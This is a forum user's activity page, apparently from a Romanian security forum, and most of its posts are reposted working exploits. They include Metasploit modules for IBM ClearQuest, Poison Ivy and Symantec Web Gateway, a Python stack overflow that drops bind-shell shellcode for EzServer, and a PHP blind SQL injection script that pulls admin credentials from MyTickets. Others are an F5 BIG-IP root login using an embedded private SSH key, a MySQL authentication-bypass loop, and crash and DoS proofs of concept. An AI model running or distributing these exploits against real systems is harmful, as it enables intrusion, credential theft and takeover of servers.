Jump to content

The_Arhitect

Active Members
 View Profile  See their activity

  • Posts

    425

  • Joined

  • Last visited

  • Days Won

    2

 Content Type 

Everything posted by The_Arhitect

  1. The_Arhitect
    https://www.youtube.com/watch?v=06WBbdaBWi8&feature=g-all-u
  2. The_Arhitect
    UPDATE: Utilizatorii care au internet de la RCS & RDS nu mai pot accesa site-ul VPLAY - IT & C > Capital.ro https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ Proxy Server List - Romania - Proxy - Romanian Proxies
  3. The_Arhitect
    IBM Rational ClearQuest CQOle Remote Code Execution ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "6.0", :ua_maxver => "7.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :classid => "{94773112-72E8-11D0-A42E-00A024DED613}", :method => "RegisterSchemaRepoFromFileByDbSet", :rank => NormalRanking }) def initialize(info={}) super(update_info(info, 'Name' => "IBM Rational ClearQuest CQOle Remote Code Execution", 'Description' => %q{ This module exploits a function prototype mismatch on the CQOle ActiveX control in IBM Rational ClearQuest < 7.1.1.9, < 7.1.2.6 or < 8.0.0.2 which allows reliable remote code execution when DEP isn't enabled. }, 'License' => MSF_LICENSE, 'Author' => [ 'Andrea Micalizzi aka rgod', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2012-0708' ], [ 'BID', '53170' ], [ 'OSVDB', '81443'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-113/' ], [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21591705' ], ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'ExitFunction' => "process", 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # cqole.dll 7.1100.0.150 [ 'Automatic', {} ], [ 'IE 6 / IE7 (No DEP)', {} ], # Because of the nature of the vulnerability no DEP is a requisite ], 'Privileged' => false, 'DisclosureDate' => "May 19 2012", 'DefaultTarget' => 0)) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ return targets[1] #IE 6 on Windows XP elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ return targets[1] #IE 7 on Windows XP elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/ return targets[1] #IE 7 on Windows Vista else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] my_target = get_target(agent) # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}") send_not_found(cli) return end js_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(my_target.arch)) object_id = rand_text_alpha(rand(8) + 4) dbset_value = rand_text_alpha(rand(8) + 4) var_payload = rand_text_alpha(rand(8) + 4) html = <<-EOS <html> <body> <object id='#{object_id}' classid='clsid:94773112-72E8-11D0-A42E-00A024DED613'></object> <script language="JavaScript"> var #{var_payload} = unescape("#{js_code}") #{object_id}.RegisterSchemaRepoFromFileByDbSet("#{dbset_value}", #{var_payload}); </script> </body> </html> EOS html = html.gsub(/^\t\t/, '') print_status("#{cli.peerhost}:#{cli.peerport} - Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end end =begin * RegisterSchemaRepoFromFile and no RegisterSchemaRepoFromFileByDbSet is called: Breakpoint 0 hit eax=3190b1a0 ebx=00000000 ecx=03015cf0 edx=7835f5d2 esi=0013e200 edi=0000000c eip=78371062 esp=0013e204 ebp=0013e2b4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206 MFC80U!_AfxDispatchCall+0xe: 78371062 ffd0 call eax {cqole!OAdSession::RegisterSchemaRepoFromFile (3190b1a0)} * RegisterSchemaRepoFromFile prototype (it is going to be executed): .text:31865E40 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFile(wchar_t const *) his ret is: retn 4 * RegisterSchemaRepoFromFileByDbSet prototype (it should be executed): .text:31866280 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFileByDbSet(wchar_t const *, wchar_t const *) his ret is: retn 8 * When RegisterSchemaRepoFromFile returns to MFC80U!_AfxDispatchCall it is what happens: 0:000> p eax=00186864 ebx=00000000 ecx=442d618d edx=00070001 esi=0013e200 edi=0000000c eip=78371064 esp=0013e208 ebp=0013e2b4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202 MFC80U!_AfxDispatchCall+0x10: 78371064 c3 ret 0:000> dd esp 0013e208 001dcff4 7835f5d2 fffffffe 78336a3a ESP is pointing to the second argument of RegisterSchemaRepoFromFileByDbSet and no to the stored EIP on the stack. The ret from MFC80U!_AfxDispatchCall allows to get control on a reliable way when DEP is disabled =end Sursa: IBM Rational ClearQuest CQOle Remote Code Execution
  4. The_Arhitect
    Poison Ivy 2.3.2 C&C Server Buffer Overflow ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => "Poison Ivy 2.3.2 C&C Server Buffer Overflow", 'Description' => %q{ This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server. The exploit does not need to know the password chosen for the bot/server communication. If the C&C is configured with the default 'admin' password, the exploit should work fine. In case of the C&C configured with another password the exploit can fail. The 'check' command can be used to determine if the C&C target is using the default 'admin' password. Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread responsible of handling the connection. Because of this the module provides the RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header will be used. If the bruteforce target is selected, a random header will be sent in case the default for the password 'admin' doesn't work. Bruteforce will stop after 5 tries or a session obtained. }, 'License' => MSF_LICENSE, 'Author' => [ 'Andrzej Dereszowski', # Vulnerability Discovery 'Gal Badishi', # Exploit and Metasploit module 'juan vazquez' # Testing and little of Metasploit-fu ], 'References' => [ [ 'URL', 'http://www.signal11.eu/en/research/articles/targeted_2010.pdf' ], [ 'URL', 'http://badishi.com/own-and-you-shall-be-owned' ] ], 'DisclosureDate' => "Jun 24 2012", 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'StackAdjustment' => -4000, 'Space' => 10000, 'BadChars' => "", }, 'Platform' => 'win', 'Targets' => [ [ 'Poison Ivy 2.3.2 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe" 'RWAddress' => 0x00401000, 'Offset' => 0x806D, 'PayloadOffset' => 0x75, 'jmpPayload' => "\x81\xec\x00\x80\x00\x00\xff\xe4" # sub esp,0x8000 # jmp esp } ], [ 'Poison Ivy 2.3.2 - Bruteforce / Windows XP SP3 / Windows 7 SP1', { 'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe" 'RWAddress' => 0x00401000, 'Offset' => 0x806D, 'PayloadOffset' => 0x75, 'jmpPayload' => "\x81\xec\x00\x80\x00\x00\xff\xe4", # sub esp,0x8000 # jmp esp 'Bruteforce' => { 'Start' => { 'Try' => 1 }, 'Stop' => { 'Try' => 6 }, 'Step' => 1, 'Delay' => 2 } } ], ], 'DefaultTarget' => 0 )) register_options( [ Opt::RPORT(3460), OptBool.new('RANDHEADER', [true, 'Send random bytes as the header', false]) ], self.class) register_advanced_options( [ OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 2 ]), ], self.class) end def check sig = "\x35\xe1\x06\x6c\xcd\x15\x87\x3e\xee\xf8\x51\x89\x66\xb7\x0f\x8b" lensig = [0x000015D0].pack("V") connect sock.put("\x00" * 256) response = sock.read(256) datalen = sock.read(4) disconnect if datalen == lensig if response[0, 16] == sig print_status("Password appears to be \"admin\"") else print_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.") end return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def single_exploit if datastore['RANDHEADER'] == true # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password header = rand_text(0x20) else # This is the 32-byte header we want to send, encrypted with the default password ("admin") # We have a very good chance of succeeding even if the password was changed header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7" end do_exploit(header) end def brute_exploit(brute_target) if brute_target['Try'] == 1 print_status("Bruteforcing - Try #{brute_target['Try']}: Header for 'admin' password") # This is the 32-byte header we want to send, encrypted with the default password ("admin") # We have a very good chance of succeeding even if the password was changed header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7" else print_status("Bruteforcing - Try #{brute_target['Try']}: Random Header") # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password header = rand_text(0x20) end do_exploit(header) end def do_exploit(header) # Handshake connect print_status("Performing handshake...") sock.put("\x00" * 256) sock.get # Don't change the nulls, or it might not work xploit = '' xploit << header xploit << "\x00" * (target['PayloadOffset'] - xploit.length) xploit << payload.encoded xploit << "\x00" * (target['Offset'] - xploit.length) xploit << [target.ret].pack("V") # ret to a jmp esp opcode xploit << [target['RWAddress']].pack("V") # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword) xploit << target['jmpPayload'] # This comes immediately after ret - it is a setup for the payload (jmp back) # The disconnection triggers the exploit print_status("Sending exploit...") sock.put(xploit) select(nil,nil,nil,5) disconnect end end =begin * ROP version of exploit(): Has been discarded at the moment because of two reasons: (1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process) (2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter =end Sursa: Poison Ivy 2.3.2 C&C Server Buffer Overflow
  5. The_Arhitect
    DEEPSIDE DEEJAYS - LOOK INTO MY EYES [OFFICIAL SINGLE 2012] - YouTube
  6. The_Arhitect
    WordPress Website FAQ Plugin v1.0 SQL Injection # Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection # Date: 6/25/12 # Exploit Author: Chris Kellum # Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/ # Software Link: http://downloads.wordpress.org/plugin/website-faq.zip # Version: 1.0 ============================================================================== Vulnerability location: /wp-content/plugins/website-faq/website-faq-widget.php ============================================================================== Lines 106-115: function displayAnswer() { global $wpdb; $master_table = $wpdb->prefix . "faq"; $category = $_POST['category']; $searchtxt = $_POST['searchtxt']; if($category!=0) { $sql = "SELECT * FROM $master_table WHERE faq_category=".$category." AND faq_question LIKE '%".$searchtxt."%'"; } =============================================================== Vulnerability Details: faq_category vulnerable to SQL injection =============================================================== When submitting a query via the widget, intercept the post request via burp or other proxy to find the following: action=displayAnswer&category=1&searchtxt=[your query] Changing category=1 to category=1 or 1=1 -- exposes the vulnerability, as it returns all FAQ results regardless of searchtxt value. Sursa: WordPress Website FAQ Plugin v1.0 SQL Injection
  7. The_Arhitect
    Ezhometech Ezserver 6.4 Stack Overflow Exploit # Exploit Title: Ezhometech EzServer <=6.4 Stack Overflow Vulnerability # Author: modpr0be # Contact: research[at]Spentera[dot]com # Platform: Windows # Tested on: Windows XP SP3 (OptIn), Windows 2003 SP2 (OptIn) # Software Link: http://www.ezhometech.com/buy_ezserver.htm # References: http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-stack-overflow-vulnerability/ ### Software Description # EZserver is a Video Server that stream Full HD to various devices. ### Vulnerability Details # Buffer overflow condition exist in URL handling, sending long GET request # will cause server process to exit and may allow malicious code injection. # Further research found that the application does not care about the HTTP method, # so that by sending long characters will make the program crash. ### Vendor logs: # 06/11/2012 - Bug found # 06/12/2012 - Vendor contacted # 06/16/2012 - No response from vendor, POC release. #!/usr/bin/python import sys import struct from socket import * from os import system from time import sleep hunt = ( "\x66\x81\xCA\xFF\x0F\x42\x52\x6A" "\x02\x58\xCD\x2E\x3C\x05\x5A\x74" "\xEF\xB8\x77\x30\x30\x74\x8B\xFA" "\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7") #windows/shell_bind_tcp - 751 bytes #http://www.metasploit.com #Encoder: x86/alpha_upper #AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444, shellcode = ("\x89\xe5\xda\xcf\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43" "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4c\x49\x45\x50" "\x35\x50\x53\x30\x35\x30\x4b\x39\x4a\x45\x36\x51\x38\x52\x33" "\x54\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x46\x32\x44\x4c\x4c\x4b" "\x30\x52\x45\x44\x4c\x4b\x33\x42\x37\x58\x44\x4f\x38\x37\x51" "\x5a\x57\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e\x4c\x47\x4c" "\x53\x51\x43\x4c\x34\x42\x46\x4c\x37\x50\x49\x51\x38\x4f\x54" "\x4d\x53\x31\x38\x47\x4a\x42\x4a\x50\x36\x32\x56\x37\x4c\x4b" "\x56\x32\x44\x50\x4c\x4b\x37\x32\x37\x4c\x43\x31\x38\x50\x4c" "\x4b\x37\x30\x33\x48\x4b\x35\x59\x50\x54\x34\x31\x5a\x33\x31" "\x4e\x30\x36\x30\x4c\x4b\x30\x48\x52\x38\x4c\x4b\x56\x38\x57" "\x50\x53\x31\x4e\x33\x4a\x43\x57\x4c\x30\x49\x4c\x4b\x50\x34" "\x4c\x4b\x53\x31\x39\x46\x50\x31\x4b\x4f\x36\x51\x59\x50\x4e" "\x4c\x59\x51\x48\x4f\x34\x4d\x45\x51\x59\x57\x50\x38\x4b\x50" "\x53\x45\x5a\x54\x33\x33\x53\x4d\x4b\x48\x47\x4b\x33\x4d\x31" "\x34\x42\x55\x4a\x42\x46\x38\x4c\x4b\x36\x38\x31\x34\x45\x51" "\x38\x53\x55\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x35" "\x4c\x43\x31\x59\x43\x4c\x4b\x34\x44\x4c\x4b\x35\x51\x48\x50" "\x4c\x49\x31\x54\x31\x34\x57\x54\x51\x4b\x31\x4b\x55\x31\x56" "\x39\x30\x5a\x50\x51\x4b\x4f\x4d\x30\x31\x48\x31\x4f\x30\x5a" "\x4c\x4b\x54\x52\x5a\x4b\x4d\x56\x51\x4d\x33\x58\x37\x43\x47" "\x42\x45\x50\x53\x30\x43\x58\x34\x37\x53\x43\x46\x52\x31\x4f" "\x50\x54\x52\x48\x30\x4c\x54\x37\x46\x46\x53\x37\x4b\x4f\x39" "\x45\x58\x38\x4c\x50\x55\x51\x43\x30\x45\x50\x37\x59\x58\x44" "\x46\x34\x56\x30\x53\x58\x31\x39\x4d\x50\x32\x4b\x45\x50\x4b" "\x4f\x58\x55\x36\x30\x56\x30\x56\x30\x46\x30\x47\x30\x46\x30" "\x31\x50\x46\x30\x55\x38\x4a\x4a\x44\x4f\x39\x4f\x4b\x50\x4b" "\x4f\x48\x55\x4d\x59\x59\x57\x50\x31\x59\x4b\x30\x53\x55\x38" "\x55\x52\x35\x50\x52\x31\x51\x4c\x4b\x39\x4a\x46\x32\x4a\x32" "\x30\x31\x46\x50\x57\x35\x38\x49\x52\x59\x4b\x56\x57\x53\x57" "\x4b\x4f\x39\x45\x30\x53\x51\x47\x52\x48\x4e\x57\x4d\x39\x37" "\x48\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x50\x53\x30\x57\x35\x38" "\x44\x34\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x56\x37\x4c" "\x49\x58\x47\x43\x58\x34\x35\x42\x4e\x50\x4d\x53\x51\x4b\x4f" "\x58\x55\x55\x38\x43\x53\x52\x4d\x33\x54\x55\x50\x4c\x49\x4b" "\x53\x51\x47\x46\x37\x31\x47\x36\x51\x4c\x36\x33\x5a\x42\x32" "\x31\x49\x46\x36\x5a\x42\x4b\x4d\x45\x36\x48\x47\x47\x34\x31" "\x34\x37\x4c\x55\x51\x33\x31\x4c\x4d\x30\x44\x47\x54\x44\x50" "\x48\x46\x35\x50\x30\x44\x30\x54\x30\x50\x46\x36\x51\x46\x56" "\x36\x37\x36\x46\x36\x30\x4e\x31\x46\x51\x46\x51\x43\x31\x46" "\x32\x48\x52\x59\x48\x4c\x57\x4f\x4b\x36\x4b\x4f\x38\x55\x4d" "\x59\x4d\x30\x50\x4e\x56\x36\x51\x56\x4b\x4f\x36\x50\x43\x58" "\x54\x48\x4c\x47\x55\x4d\x33\x50\x4b\x4f\x4e\x35\x4f\x4b\x4a" "\x50\x58\x35\x4f\x52\x36\x36\x53\x58\x49\x36\x4d\x45\x4f\x4d" "\x4d\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x53\x4c\x35\x5a\x4d" "\x50\x4b\x4b\x4d\x30\x54\x35\x55\x55\x4f\x4b\x57\x37\x35\x43" "\x32\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41" "\x41") junk1 = "\x41" * 5025 junk2 = "\x42" * 5029 junk3 = "\x43" * 10000 buff = "w00tw00t" buff+= shellcode buff+= "\x90" * 100 buff+= "\xeb\x08\x90\x90" buff+= struct.pack('<L', 0x10212779) buff+= "\x90" * 16 buff+= hunt buff+= "\x44" * 5000 def winxp(): try: host = raw_input("[!] Target IP: ") print "[!] Connecting to %s on port 8000" %host s = socket(AF_INET, SOCK_STREAM) s.connect((host,8000)) print "[+] Launching attack.." print "[+] Sending payload.." payload = junk1+buff s.send (payload) s.close() print "[+] Wait for hunter.." sleep(5) print "[+] Connecting to target shell!" sleep(2) system("nc -v %s 4444" %host) except: print "[x] Could not connect to the server x_x" sys.exit() def win2k3(): try: host = raw_input("[!] Target IP: ") print "[!] Connecting to %s on port 8000" %host s = socket(AF_INET, SOCK_STREAM) s.connect((host,8000)) print "[+] Launching attack.." print "[+] Sending payload.." payload = junk2+buff s.send(payload) s.close() print "[+] Wait for hunter.." sleep(5) print "[+] Connecting to target shell!" sleep(1) system("nc -v %s 4444" %host) except: print "[x] Could not connect to the server x_x" sys.exit() def crash(): try: host = raw_input("[!] Target IP: ") print "[!] Connecting to %s on port 8000" %host s = socket(AF_INET, SOCK_STREAM) s.connect((host,8000)) print "[+] Launching attack.." print "[+] Sending payload.." payload = junk3 s.send (payload) s.close() print "[+] Server should be crashed! Check your debugger" except: print "[x] Could not connect to the server x_x" sys.exit() print "#################################################################" print "# EZHomeTech EZServer <= 6.4.0.17 Stack Overflow Exploit #" print "# by modpr0be[at]spentera | @modpr0be #" print "# thanks to: otoy, cikumel, y0k | @spentera #" print "=================================================================" print "\t1.Windows XP SP3 (DEP OptIn) bindshell on port 4444" print "\t2.Windows 2003 SP2 (DEP OptIn) bindshell on port 4444" print "\t3.Crash only (debug)\n" a = 0 while a < 3: a = a + 1 op = input ("[!] Choose your target OS: ") if op == 1: winxp() sys.exit() elif op == 2: win2k3() sys.exit() elif op == 3: crash() sys.exit() else: print "[-] Oh plz.. pick the right one \r\n" Sursa: Ezhometech Ezserver 6.4 Stack Overflow Exploit
  8. The_Arhitect
    MyTickets 1 to 2.0.8 Blind SQL Injection <?php /* --------------------------------------------------------------- MyTickets <= Remote Blind SQL Injection Exploit by al-swisre --------------------------------------------------------------- author...............: al-swisre mail.................: oy3[at]hotmail[dot]com software link........: http://phpx3.com/scripts.html#mytickets affected versions....: from 1 to 2.0.8 [-] Vulnerable code in include/system/general/define.php: 43. if(empty($cookies['language'])){ 44. setcookie('MyTickets_language',$setting['default_language'],time()+86400,"/"); 45. $language = $setting['default_language']; 46. }else{ 47. if($db->count('languages',"`id`='".$cookies['language']."'") == 0){ 48. $language = $setting['default_language']; 49. } 50. $language = $cookies['language']; 52. } 52. 53. $language_array = $db->fetch($db->query("SELECT * FROM `languages` WHERE `id`='".$language."'")); */ print "\n+--------------------------------------------------------------------+"; print "\n| MyTickets <= Remote Blind SQL Injection Exploit by al-swisre |"; print "\n+--------------------------------------------------------------------+\n"; if (!extension_loaded('curl')) die("cURL extension required\n"); error_reporting(E_ERROR); set_time_limit(0); function get($url,$inj) { $curl = curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,3); curl_setopt($curl,CURLOPT_URL,$url); curl_setopt($curl, CURLOPT_COOKIE, "MyTickets_language=1$inj"); curl_setopt($curl, CURLOPT_HEADER, 1); curl_setopt($curl, CURLOPT_VERBOSE, 0); $calis = curl_exec($curl); @curl_close($calis); return $calis; } function chek_get($connect) { if(eregi("include",$connect)) { return false; } else { return true; } } if ($argc < 2) { print "\nUsage......: php $argv[0] <url>\n"; print "\nExample....: php $argv[0] http://localhost/mytickets/"; print "\nExample....: php $argv[0] http://localhost/mytickets/\n"; die(); } $sql_f = chek_get(get($argv[1],"' and 1='2 /*")); $sql_t = chek_get(get($argv[1],"' and 1='1 /*")); if($sql_t == $sql_f) { print "\n\t sorry: magic_quotes_gpc = On ): \n"; die(); } print "\n\t[+] Getting Admin Username and Password\n\n\t"; for ($g = 1; $g <= 40; $g++) { //eidt for ($i = 46; $i <= 122; $i++) { $inject = chek_get(get($argv[1],"'+AnD+ascii(MiD((sElect+concat_ws(0x3a,username,password)+frOm+members+liMit 0,1),".$g.",1))='".$i."/*")); if($inject == true){print chr($i);} } } ?> Sursa: MyTickets 1 to 2.0.8 Blind SQL Injection
  9. The_Arhitect
    Total Video Player 1.31 .m3u Crash PoC # Exploit Title: Total Video Player 1.31 .m3u Crash Poc # Date: June 17 2012 # Exploit Author: 0dem # Vendor Homepage: http://www.effectmatrix.com/ # Software Link: http://download.cnet.com/Total-Video-Player/3000-2139_4-10552696.html # Version: V1.31 # Tested on: Windows XP SP 3 # Description: Total Video Player has no correct input handling and will hang, # when trying to open malformed .m3u files. .mp3 and .avi files are affected too # --- m3u ----------------------------------------------- #!/usr/bin/python junk = "#EXTM3U\n" junk += "#EXTINF:666, 0dem, 0dem\n" junk += "c:\\A" file = open("PoC.m3u","w") file.writelines(junk) file.close() # --- mp3 ----------------------------------------------- #!/usr/bin/python junk = "\x41" * 100 file = open("PoC.mp3","w") file.writelines(junk) file.close() # --- avi ----------------------------------------------- #!/usr/bin/python junk = "\x41" * 100 file = open("PoC.avi","w") file.writelines(junk) file.close() Sursa: Total Video Player 1.31 .m3u Crash PoC
  10. The_Arhitect
    OpenType Font File Format DoS Exploit for Windows ************************************************************************ OpenType font file format remote (client-side) DoS exploit for Windows By Oleksiuk Dmytro (aka Cr4sh) http://twitter.com/d_olex http://blog.cr4.sh mailto:cr4sh0@gmail.com ************************************************************************ INFO: Zero day vulnerability exists in kernel-mode library ATMFD.DLL, that using by OS for working with PostScript-based OpenType font files (.OTF) Vulnerable versions of Windows/ATMFD.DLL: all, x32 and x64. Opening malicious .OTF font file, that can be embedded in Microsoft Office document or web-page, causes a BSoD on NT 5.x (Windows XP, Server 2003) and 100% CPU overage on NT 6.x (Vista, 7, Server 2008). To trigger vulnerability -- double click on CFF_Type-1_0x0d_expl.otf The point of vulnerability -- invalid decoding of 0x0d byte in the Type 2 Charstring Format Glyph, that drops ATMFD.DLL code into the infinite loop. "good" glyph representation: [68]={ 95 112 99 65 61 vhcurveto endchar } Malicious glyph representation: [68]={ 95 112 99 65 reserved13 vhcurveto endchar } This vulnerability was found with MsFontsFuzz fuzzer, that can be downloaded on https://github.com/Cr4sh/MsFontsFuzz More detailed vulnerability analysis can be found at http://blog.cr4.sh/2012/06/0day-windows.html (russian, use Google Translate). ==== POC ==== http://www.exploit-db.com/sploits/19089.rar Sursa: OpenType Font File Format DoS Exploit for Windows
  11. The_Arhitect
    Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection", 'Description' => %q{ This module exploits a command injection vulnerability found in Symantec Web Gateway's HTTP service due to the insecure usage of the exec() function. This module abuses the spywall/ipchange.php file to execute arbitrary OS commands without authentication. }, 'License' => MSF_LICENSE, 'Author' => [ 'Tenable Network Security', # Vulnerability Discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2012-0297' ], [ 'BID', '53444' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ], [ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ] ], 'Payload' => { 'BadChars' => "\x00\x0d\x0a\x26", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl', } }, 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Targets' => [ ['Symantec Web Gateway 5.0.2.8', {}], ], 'Privileged' => false, 'DisclosureDate' => "May 17 2012", 'DefaultTarget' => 0)) end def check res = send_request_raw({ 'method' => 'GET', 'uri' => '/spywall/login.php' }) if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/ return Exploit::CheckCode::Detected else return Exploit::CheckCode::Safe end end def exploit uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" post_data = "subnet=" post_data << "\";" + payload.raw + ";#" print_status("#{peer} - Sending Command injection") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}spywall/ipchange.php", 'data' => post_data }) # If the server doesn't return the default redirection, probably # something is wrong if not res or res.code != 302 or res.headers['Location'] !~ /SW\/admin_config.php/ print_error("#{peer} - Probably command not executed, aborting!") return end end end Sursa: Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection
  12. The_Arhitect
    F5 BIG-IP Remote Root Authentication Bypass Vulnerability #!/usr/bin/python # # Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py) # # Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass # http://www.secmaniac.com # # import subprocess,os filewrite = file("priv.key", "w") filewrite.write("""-----BEGIN RSA PRIVATE KEY----- MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF 8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv 7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM 2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s 37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4 rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/ uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS -----END RSA PRIVATE KEY-----""") filewrite.close() subprocess.Popen("chmod 700 priv.key", shell=True).wait() ipaddr=raw_input("Enter the IP address of the F5: ") subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait() if os.path.isfile("priv.key"): os.remove("priv.key") Sursa: F5 BIG-IP Remote Root Authentication Bypass Vulnerability
  13. The_Arhitect
    MySQL Remote Root Authentication Bypass #!/usr/bin/python # # # This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little. # # Title: MySQL Remote Root Authentication Bypass # Written by: Dave Kennedy (ReL1K) # http://www.secmaniac.com # # Original advisory here: seclists.org/oss-sec/2012/q2/493 import subprocess ipaddr = raw_input("Enter the IP address of the mysql server: ") while 1: subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait() Sursa: MySQL Remote Root Authentication Bypass
  14. The_Arhitect
